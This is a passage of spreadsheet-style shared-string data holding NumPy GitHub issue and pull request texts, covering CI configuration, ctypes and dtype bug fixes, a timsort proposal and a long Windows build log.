| 40000     | 1.99861            | 3.85                 |_x000D_
| 80000     | 1.99891            | 3.85                 |_x000D_
| 160000    | 1.99957            | 3.86                 |_x000D_
| 320000    | 1.99521            | 3.86                 |_x000D_
| 640000    | 1.99623            | 3.86                 |_x000D_
| 1280000   | 1.99966            | 3.81                 |_x000D_
| 2560000   | 1.96163            | 3.38                 |_x000D_
| 5120000   | 1.92656            | 3.24                 |_x000D_
| 10240000  | 1.92680            | 3.17                 |_x000D_
| 20480000  | 1.92289            | 3.12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</si>
  <si>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Add AVX2 and AVX512 functionality for numpy.sqrt</t>
  </si>
  <si>
    <t>Our `README` file / repo landing page currently has an Azure badge that links to nothing more than a new page with the Azure badge image._x000D_
_x000D_
This PR follows the [latest Azure docs](https://docs.microsoft.com/en-us/azure/devops/pipelines/get-started-yaml?view=vsts#add-a-ci-status-badge-to-your-repository) for placing the badge / link in a project readme, and seems to work._x000D_
_x000D_
More than likely happened either because of our early-adoption of the service and / or the various adjustments we had to make to the configurations / pipelines to get things working just right.</t>
  </si>
  <si>
    <t>MAINT, DOC: fix Azure README badge</t>
  </si>
  <si>
    <t>**Objective**: test the MacOS configuration that most closely matches what many users have access to (wheels built with `openblas`) &amp; perhaps slightly reduce the testing dissonance between development CI &amp; numpy-wheel CI builds, by building with `openblas`._x000D_
_x000D_
&lt;details&gt;_x000D_
_x000D_
[Reference to `brew install openblas`](https://github.com/matthew-brett/multibuild/blob/devel/library_builders.sh#L99) in `multibuild` repo_x000D_
_x000D_
Previously, in [a master branch run](https://dev.azure.com/numpy/numpy/_build/results?buildId=1024&amp;view=logs) for MacOS / Python 3.6 Azure: `7218 passed, 39 skipped, 10 xfailed, 1 xpassed in 309.53 seconds`_x000D_
_x000D_
Azure CI result for MacOS with openblas in this branch should be: `7217 passed, 40 skipped, 10 xfailed, 1 xpassed in 298.79 seconds`_x000D_
  - 1 extra test skip related to `xerbla` &amp; not clear if this is skipped in our matching Python 3.6 MacOS [wheel build log](https://api.travis-ci.org/v3/job/460421265/log.txt) where test skips aren't verbose, but far more tests are skipped (`167` to `170`)._x000D_
_x000D_
The `Build NumPy` stage should now clearly show `openblas` as `FOUND` by distutils, and the end of this stage should no longer print the warnings about various missing linalg acceleration libraries._x000D_
_x000D_
_x000D_
&lt;/details&gt;</t>
  </si>
  <si>
    <t>TST: openblas for Azure MacOS</t>
  </si>
  <si>
    <t xml:space="preserve">This also improves `np.ctypeslib.as_ctypes` to support more types of array:_x000D_
* non-native endianness_x000D_
* structured arrays with non-overlapping fields_x000D_
* booleans (fixes #6176)_x000D_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</si>
  <si>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The Azure `condition` directive and multi-line powershell commands work just fine now as evidenced by my recent work on the [SciPy Azure CI PR](https://github.com/scipy/scipy/pull/9542) &amp; the recent adoption of the `condition` directive in the `numba` project CI._x000D_
_x000D_
This replaces the long single-line jumble with in-line version checking, and produces a nice mouse-over dialog box in Azure GUI when skipped in CI for non-2.7 test runs._x000D_
_x000D_
Of course, 2.7 support is on the way out and if this isn't a sufficiently useful clean-up I suppose we may just mutate this PR into removing 2.7 from the matrix, but I'll leave that up to reviewers.</t>
  </si>
  <si>
    <t>TST: use condition directive for Azure 2.7 check</t>
  </si>
  <si>
    <t xml:space="preserve">Redefine stack functions, when stacked with an empty matrix, it equals to itself._x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
np.vstack(([], A)) == np.hstack(([], A)) == A  (== np.concatenate(([], A)))_x000D_
```_x000D_
```_x000D_
# pseudo code_x000D_
A = array([])_x000D_
for-loop_x000D_
    A1 = ..._x000D_
    if A is empty_x000D_
        A = A1_x000D_
    else_x000D_
        stack A on A1_x000D_
```_x000D_
Otherwise, I have to define a m*n empty matrix before stacking, or use if-statement to define A._x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
</t>
  </si>
  <si>
    <t>stack with an empty matrix</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
When running the tests the output is a little ambiguous. As stated in issue [#12450](https://github.com/numpy/numpy/issues/12450), running_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```import numpy_x000D_
numpy.test('full')_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
gives the impression (to a newcomer) of 9 tests failing:_x000D_
_x000D_
````_x000D_
4686 passed, 362 skipped, 9 xfailed, 5 warnings in 213.99 seconds_x000D_
True_x000D_
````_x000D_
_x000D_
So a suggestion is to change the output to be less ambiguous, in particular for the "xfailed". Thanks!_x000D_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_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Possible disambiguity in documentation/ Suggestion</t>
  </si>
  <si>
    <t>These lines are contradictory:_x000D_
https://github.com/numpy/numpy/blob/11a316e1f5f7f8130bbd8184b1b0c46bccab01a5/numpy/_pytesttester.py#L101-L125_x000D_
_x000D_
`result` is a boolean, so does not have those attributes</t>
  </si>
  <si>
    <t>Docs for PytestTester.__call__ are wrong</t>
  </si>
  <si>
    <t>Fixes #10409  Closes #11530_x000D_
_x000D_
This is the (hopefully) last of a long-running series of PRs attepting to make multifield-indexes return views instead of copies, which has been planned since about Numpy 1.6 or 1.7. I have some writeup of the motivation here: https://gist.github.com/ahaldane/6cd44886efb449f9c8d5ea012747323b#multifield-views and in the linked mailing list discussions there._x000D_
_x000D_
This is an "un-revert" of #10411, which was a revert of part of #6053. The reason we can do the unreversion now is that: 1. We have fixed #8100, which was the main source of bugs that caused us to revert this change originally, and 2. We have merged #11526 which provides helper functions for cases which this change will break._x000D_
_x000D_
In the mailing list discussions we did get some pushback on this backcompat break. So please consider this PR an opportunity to debate whether we should make the change at all. Myself, I'd say we go ahead with it, since it seemed enough devs supported the change on the mailing list, because I think the new helper functions are better and safer than the old "trick" using views in any case, plus the other reasons in the introductory maling list post: https://mail.python.org/pipermail/numpy-discussion/2018-January/077624.html</t>
  </si>
  <si>
    <t>ENH: add back the multifield copy-&gt;view change</t>
  </si>
  <si>
    <t>Followup to #11526 fixing up a few issues with that PR.</t>
  </si>
  <si>
    <t>MAINT: Fixups to new functions in np.lib.recfunctions</t>
  </si>
  <si>
    <t>This uses list comprehension when possible (instead of creating a list by appending to it in a for loop), which is faster and less verbose._x000D_
_x000D_
Tried to only make the changes in some simple cases when it doesn't hurt readability.</t>
  </si>
  <si>
    <t>MAINT: Use list and dict comprehension when possible</t>
  </si>
  <si>
    <t>Since Python 2.6 is no longer supported, set literals can be used which are a bit more readable, and [somewhat faster](https://renzo.lucioni.xyz/pythons-set-literals/) (though I don't thing that it matters much for the below changes)._x000D_
_x000D_
Closes https://github.com/numpy/numpy/issues/3084_x000D_
_x000D_
(I have not run 2to3 `setliteral` fixer as suggested in the issue, but rather did the changes manually).</t>
  </si>
  <si>
    <t>MAINT Use set litterals</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
https://github.com/numpy/numpy/blob/983bbb5ed2495e034b437a0b58a69371d4dfed74/numpy/core/records.py#L796_x000D_
_x000D_
Seems like unfortunately numpy.core.records.fromfile method uses 32 bit integers. Makes it impossible to read data larger than 4GB._x000D_
_x000D_
Python 3.7.1 64 bit_x000D_
numpy 1.15.4 (numpy-1.15.4-cp37-none-win_amd64.whl)_x000D_
_x000D_
call:_x000D_
_x000D_
`raw_data = numpy.core.records.fromfile(io_input,_x000D_
                                           shape=420453029, offset=0,_x000D_
                                           formats='i4,u4,i4',_x000D_
                                           names='t,k,n',_x000D_
                                           byteorder='&lt;')`</t>
  </si>
  <si>
    <t xml:space="preserve">records.fromfile - 64 bit incompatibility </t>
  </si>
  <si>
    <t xml:space="preserve">This makes things harder to debug._x000D_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</si>
  <si>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don't override original errors when casting inside np.dot() fails</t>
  </si>
  <si>
    <t>Fixes #12438. by not limiting the hidden attribute to gcc 4. ~Could be future -proofed by making sure the arbitrary function chosen actually appears in the source files with the `NPY_NO_EXPORT` attribute, or by building a specific shared object for this test, but this at least solves the current issues.~ _x000D_
_x000D_
Edit: create a function in `_multiarray_tests`</t>
  </si>
  <si>
    <t>BUG: test, fix NPY_VISIBILITY_HIDDEN on gcc, which becomes NPY_NO_EXPORT</t>
  </si>
  <si>
    <t>Refactor the creation of `datetime64.c_metadata`. Spun off of PR #12430. Part of making dtype into a `PyTypeObject`</t>
  </si>
  <si>
    <t>MAINT: refactor datetime.c_metadata creation</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t xml:space="preserve">This:_x000D_
* fixes a regression in 1.15, where it became impossible to set the return value of a cdll function to an ndpointer._x000D_
* removes `ndpointer.__array_interface__`, which was being ignored anyway in favor of the PEP3118 buffer protocol_x000D_
* adds `ndpointer.contents` to recover the lost functionality, while staying in line with the ctypes behavior_x000D_
* removes another instance of `descr`, which enables overlapping fields to be returned from C functions (such as unions)._x000D_
* Fixes a long-term bug where using ndpointer as a return type without specifying both type and dtype would produce an object array containing a single `ndpointer`. Now the ndpointer is returned directly._x000D_
_x000D_
This relates to (but does not fix) gh-12421, and likely fixes toinsson/pyrealsense#82_x000D_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</si>
  <si>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BUG/ENH: Fix use of ndpointer in return values</t>
  </si>
  <si>
    <t>['00 - Bug', '01 - Enhancement', '06 - Regression', 'component: numpy.core']</t>
  </si>
  <si>
    <t>I started making dtype classes so that the `type(np.dtype('int32'))` is no longer `numpy.dtype` rather a new `numpy.int_type` type that inherits from `numpy.dtype`, the first step in the [plan](https://hackmd.io/cVdS9UyBRayZF-tIW1lC0g#) to refactor dtypes. Rather than a single large PR, I will try to do this in a set of smaller PRs, with an "opt-out" `#ifdef` ... `#else` ... `#endif` around the code._x000D_
_x000D_
This PR is the first in the series - a refactoring of the dependency between `arraydescr_new` and `PyArray_DescrNew` so that the latter now calls the former instead of the other way around. ~I also refactored the function to create `datetime64` metadata and moved it to a different place in the file.~_x000D_
_x000D_
Benchmarking seemed to show no real difference in performance, although there is alot of variance in the `bench_core.CountNonzero.time_count_nonzero` tests</t>
  </si>
  <si>
    <t xml:space="preserve">MAINT: refactor: arraydescr_new now does not call PyArray_DescrNew </t>
  </si>
  <si>
    <t>MAINT: Update mailmap for 1.16.0 release.</t>
  </si>
  <si>
    <t>Fixes #10776 but forces use of pickle protocol 3 for writing arrays with objects, otherwise the new test fails with `MemoryError`_x000D_
_x000D_
This will break backward compatibility with python2, so pushing it off to 1.17_x000D_
_x000D_
Edit: add explanation why protocol 3 is needed</t>
  </si>
  <si>
    <t>ENH: always use zip64, upgrade pickle protocol to 3</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes an alarming bug introduced in gh-7311 (1.12) where the following is true_x000D_
_x000D_
    np.ctypeslib.ndpointer(ndim=2) is np.ctypeslib.ndpointer(shape=2)_x000D_
_x000D_
Rework of gh-11536_x000D_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</si>
  <si>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inconsistent cache keying in ndpointer</t>
  </si>
  <si>
    <t>This double negative is confusing to me.</t>
  </si>
  <si>
    <t>MNT: Reword error message about loading pickled data.</t>
  </si>
  <si>
    <t xml:space="preserve">Please see #12396 </t>
  </si>
  <si>
    <t>gfortran needs -lpthread &amp; -maix64(64 build) in AIX</t>
  </si>
  <si>
    <t xml:space="preserve">These should return an integer, as required by the function typedef._x000D_
</t>
  </si>
  <si>
    <t>Fix PyArray_FillFunc function definitions</t>
  </si>
  <si>
    <t xml:space="preserve">This is part of #12186 ._x000D_
This PR is still under development in that only numeric timsort is implemented. For argsort and sorting algorithms of string types and generic type, a dummy mergesort is pasted as place-holder. I wish to hear more feedback before moving on, for it appears implementing the sibling sorting algorithms requires lots of copy and paste._x000D_
_x000D_
### Overview_x000D_
Currently what I've done:_x000D_
1. Implement timsort for numeric sort. More on this below._x000D_
1. Add some lines in .gitignore to ignore generated files._x000D_
1. Add another option `'t'` (timsort) for `kind` argument in `sort` function. This is primarily for benchmark convenience. _x000D_
1. Add the timsort algorithm to the test suite._x000D_
1. Some benchmark between the four sorting algorithms (quick merge heap tim). The benchmark is hosted in [another repo](https://github.com/liwt31/numpy-sort-benchmark)._x000D_
_x000D_
_x000D_
### The algorithm_x000D_
The implementation is primarily based on [Tim's little article](https://github.com/python/cpython/blob/master/Objects/listsort.txt), with some simplifications:_x000D_
* Insertion sort in run-counting is not binary-search insertion sort_x000D_
* No gallop mode appear in merge process_x000D_
_x000D_
The reason for these simplifications is their large overhead. Tim's algorithm is specially designed for CPython, which have a very time-consuming comparing function. The direction of Tim's optimization is to reduce the number of comparisons required whenever possible. However, this is not necessary for most NumPy use case. Maybe for generic sort, these further optimizations can be included, however, IMHO this should be done in another PR._x000D_
I haven't prepared organized materials to show their "large overhead" I found in my experiments. If anyone is interested I'd be happy to elaborate on this._x000D_
_x000D_
_x000D_
### Benchmark_x000D_
The [benchmark](https://github.com/liwt31/numpy-sort-benchmark) includes a benchmark script, a jupyter-notebook to show the shape of the arrays involved in the benchmark for an intuitive picture, and a readme file for benchmark results and comments. Simply speaking, timsort performs well in "nearly sorted" data and shows minimal overhead in random data. Besides, I noticed the following 2 interesting phenomena:_x000D_
* Quicksort is slower than mergesort for random data, demonstrating that there has to be something wrong with the current quicksort algorithm._x000D_
* Standard deviation for time cost is very large even for the definitive already sorted array._x000D_
_x000D_
I haven't got time to dig into these and I'm more than happy to hear from you if they are actually perfectly normal._x000D_
Though timsort is designed to be stable and I've tried to make it so, I haven't done any benchmark or test for this, because I only have numeric sort in my hand._x000D_
_x000D_
_x000D_
### Feedbacks I wish to hear_x000D_
* Most importantly, is the timsort implementation OK? If so I can start porting it to argsort and so on._x000D_
* Should timsort replace mergesort? (according to benchmark result probably so)_x000D_
* Is there any need to improve the numpy benchmark suite for sorting algorithms? #12368_x000D_
* All other comments, advice and suggestions._x000D_
_x000D_
### Todo_x000D_
* [x] Implement argsort, string sort and generic sort. _x000D_
* [x] Tests and docs_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ENH: Add timsort to npysort</t>
  </si>
  <si>
    <t>['01 - Enhancement', '25 - WIP', 'component: numpy.core']</t>
  </si>
  <si>
    <t>This folds in #12410  too, because why not.</t>
  </si>
  <si>
    <t xml:space="preserve"> BUG: Fix regression on np.dtype(ctypes.c_void_p)</t>
  </si>
  <si>
    <t xml:space="preserve">Regression introduced in #12380 _x000D_
_x000D_
In 1.15.4_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; np.dtype(ctypes.c_voidp)_x000D_
dtype('uint64')_x000D_
```_x000D_
_x000D_
After:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; np.dtype(ctypes.c_voidp)_x000D_
AttributeError: type object 'c_void_p' has no attribute '__ctype_be__'_x000D_
```_x000D_
_x000D_
It's not clear to me if returning `uint64` is the right thing to do, but it's definitely better than producing an AttributeError._x000D_
</t>
  </si>
  <si>
    <t>BUG: np.dtype(ctypes.c_voidp) no longer works</t>
  </si>
  <si>
    <t xml:space="preserve">A new function was added to the ufunc_funcs_api._x000D_
_x000D_
Closes #12412._x000D_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</si>
  <si>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Update cversion hash.</t>
  </si>
  <si>
    <t>After the recent patch to CCompiler.spawn, the file-paths no longer need manual quoting - that's handled as needed within subprocess._x000D_
_x000D_
Fixes #12411_x000D_
_x000D_
---_x000D_
_x000D_
Quoting the CPython 3.6 source code, this seems to be intended:_x000D_
```_x000D_
# XXX *don't* need to be clever about quoting the_x000D_
# macro value here, because we're going to avoid the_x000D_
# shell at all costs when we spawn the command!_x000D_
```_x000D_
_x000D_
----_x000D_
_x000D_
let's see if this works on posix...</t>
  </si>
  <si>
    <t>BUG: Do not double-quote arguments to the command line</t>
  </si>
  <si>
    <t>Something we might want to deal with before 1.16:_x000D_
_x000D_
&gt; numpy\core\setup.py:400: MismatchCAPIWarning: API mismatch detected, the C API version numbers have to be updated. Current C api version is 13, with checksum 5b0e8bbded00b166125974fc71e80a33, but recorded checksum for C API version 13 in codegen_dir/cversions.txt is a1bc756c5782853ec2e3616cf66869d8. If functions were added in the C API, you have to update C_API_VERSION  in numpy\core\setup_common.py._x000D_
_x000D_
The build continues despite this warning, so it's possible we just didn't notice it. This is likely my fault as part of #8955</t>
  </si>
  <si>
    <t>MismatchCAPIWarning during build</t>
  </si>
  <si>
    <t>['06 - Regression', 'component: build']</t>
  </si>
  <si>
    <t>Bisected to b18d0a5aeaa4495b6589b4e9f297db7f8df35bdd (#11898). Output on my machine, at 1466e788a43b8d4356fe35951bf0c3b0aedb554f:_x000D_
_x000D_
```_x000D_
&gt; .\runtests.py -i_x000D_
Building, see build.log..._x000D_
numpy/random\mtrand\randint_helpers.pxi.in has not changed_x000D_
numpy/random\mtrand\mtrand.pyx has not changed_x000D_
Cythonizing sources_x000D_
blas_opt_info:_x000D_
blas_mkl_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries mkl_rt not found in ['C:\\Program Files\\Python 3.5\\lib', 'C:\\', 'C:\\Program Files\\Python 3.5\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
blis_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries blis not found in ['C:\\Program Files\\Python 3.5\\lib', 'C:\\', 'C:\\Program Files\\Python 3.5\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
openblas_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries openblas not found in ['C:\\Program Files\\Python 3.5\\lib', 'C:\\', 'C:\\Program Files\\Python 3.5\\libs']_x000D_
get_default_fcompiler: matching types: '['gnu', 'intelv', 'absoft', 'compaqv', 'intelev', 'gnu95', 'g95', 'intelvem', 'intelem', 'flang']'_x000D_
customize GnuFCompiler_x000D_
Could not locate executable g77_x000D_
Could not locate executable f77_x000D_
customize IntelVisualFCompiler_x000D_
Could not locate executable ifort_x000D_
Could not locate executable ifl_x000D_
customize AbsoftFCompiler_x000D_
Could not locate executable f90_x000D_
customize CompaqVisualFCompiler_x000D_
Could not locate executable DF_x000D_
customize IntelItaniumVisualFCompiler_x000D_
Could not locate executable efl_x000D_
customize Gnu95FCompiler_x000D_
Could not locate executable gfortran_x000D_
Could not locate executable f95_x000D_
customize G95FCompiler_x000D_
Could not locate executable g95_x000D_
customize IntelEM64VisualFCompiler_x000D_
customize IntelEM64TFCompiler_x000D_
Could not locate executable efort_x000D_
Could not locate executable efc_x000D_
customize PGroupFlangCompiler_x000D_
Could not locate executable flang_x000D_
don't know how to compile Fortran code on platform 'nt'_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_3_10_blas_threads_info:_x000D_
Setting PTATLAS=ATLAS_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries tatlas not found in ['C:\\Program Files\\Python 3.5\\lib', 'C:\\', 'C:\\Program Files\\Python 3.5\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_3_10_blas_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries satlas not found in ['C:\\Program Files\\Python 3.5\\lib', 'C:\\', 'C:\\Program Files\\Python 3.5\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_blas_threads_info:_x000D_
Setting PTATLAS=ATLAS_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries ptf77blas,ptcblas,atlas not found in ['C:\\Program Files\\Python 3.5\\lib', 'C:\\', 'C:\\Program Files\\Python 3.5\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_blas_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries f77blas,cblas,atlas not found in ['C:\\Program Files\\Python 3.5\\lib', 'C:\\', 'C:\\Program Files\\Python 3.5\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
accelerate_info:_x000D_
  NOT AVAILABLE_x000D_
_x000D_
blas_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries blas not found in ['C:\\Program Files\\Python 3.5\\lib', 'C:\\', 'C:\\Program Files\\Python 3.5\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
blas_src_info:_x000D_
  NOT AVAILABLE_x000D_
_x000D_
  NOT AVAILABLE_x000D_
_x000D_
lapack_opt_info:_x000D_
lapack_mkl_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries mkl_rt not found in ['C:\\Program Files\\Python 3.5\\lib', 'C:\\', 'C:\\Program Files\\Python 3.5\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
openblas_lapack_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries openblas not found in ['C:\\Program Files\\Python 3.5\\lib', 'C:\\', 'C:\\Program Files\\Python 3.5\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
openblas_clapack_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries openblas,lapack not found in ['C:\\Program Files\\Python 3.5\\lib', 'C:\\', 'C:\\Program Files\\Python 3.5\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_3_10_threads_info:_x000D_
Setting PTATLAS=ATLAS_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries tatlas,tatlas not found in C:\Program Files\Python 3.5\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in C:\Program Files\Python 3.5\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries tatlas,tatlas not found in C:\_x000D_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tatlas,tatlas not found in C:\Program Files\Python 3.5\libs_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in C:\Program Files\Python 3.5\libs_x000D_
&lt;class 'numpy.distutils.system_info.atlas_3_10_threads_info'&gt;_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_3_10_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries satlas,satlas not found in C:\Program Files\Python 3.5\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in C:\Program Files\Python 3.5\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries satlas,satlas not found in C:\_x000D_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satlas,satlas not found in C:\Program Files\Python 3.5\libs_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in C:\Program Files\Python 3.5\libs_x000D_
&lt;class 'numpy.distutils.system_info.atlas_3_10_info'&gt;_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_threads_info:_x000D_
Setting PTATLAS=ATLAS_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries ptf77blas,ptcblas,atlas not found in C:\Program Files\Python 3.5\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in C:\Program Files\Python 3.5\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries ptf77blas,ptcblas,atlas not found in C:\_x000D_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ptf77blas,ptcblas,atlas not found in C:\Program Files\Python 3.5\libs_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in C:\Program Files\Python 3.5\libs_x000D_
&lt;class 'numpy.distutils.system_info.atlas_threads_info'&gt;_x000D_
  NOT AVAILABLE_x000D_
_x000D_
atlas_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries f77blas,cblas,atlas not found in C:\Program Files\Python 3.5\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in C:\Program Files\Python 3.5\lib_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries f77blas,cblas,atlas not found in C:\_x000D_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f77blas,cblas,atlas not found in C:\Program Files\Python 3.5\libs_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack_atlas not found in C:\Program Files\Python 3.5\libs_x000D_
&lt;class 'numpy.distutils.system_info.atlas_info'&gt;_x000D_
  NOT AVAILABLE_x000D_
_x000D_
lapack_info:_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
customize MSVCCompiler_x000D_
  libraries lapack not found in ['C:\\Program Files\\Python 3.5\\lib', 'C:\\', 'C:\\Program Files\\Python 3.5\\libs']_x000D_
  NOT AVAILABLE_x000D_
_x000D_
lapack_src_info:_x000D_
  NOT AVAILABLE_x000D_
_x000D_
  NOT AVAILABLE_x000D_
_x000D_
running build_x000D_
running config_cc_x000D_
unifing config_cc, config, build_clib, build_ext, build commands --compiler options_x000D_
running config_fc_x000D_
unifing config_fc, config, build_clib, build_ext, build commands --fcompiler options_x000D_
running build_src_x000D_
build_src_x000D_
building py_modules sources_x000D_
creating build\src.win-amd64-3.5_x000D_
creating build\src.win-amd64-3.5\numpy_x000D_
creating build\src.win-amd64-3.5\numpy\distutils_x000D_
building library "npymath" sources_x000D_
No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\BIN\x86_amd64\cl.exe /c /nologo /Ox /W3 /GL /DNDEBUG /MD -Inumpy\core\src\common -Inumpy\core\src -Inumpy\core -Inumpy\core\src\npymath -Inumpy\core\src\multiarray -Inumpy\core\src\umath -Inumpy\core\src\npysort -I"C:\Program Files\Python 3.5\include" -I"C:\Program Files\Python 3.5\include" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\INCLUDE" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\INCLUDE" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\ucrt" -I"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\include\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\shared" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\winrt" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\INCLUDE" -I"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\ATLMFC\INCLUDE" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\ucrt" -I"C:\Program Files (x86)\Windows Kits\NETFXSDK\4.6.1\include\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\shared" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\um" -I"C:\Program Files (x86)\Windows Kits\10\include\10.0.16299.0\winrt" /Tc_configtest.c /Fo_configtest.obj_x000D_
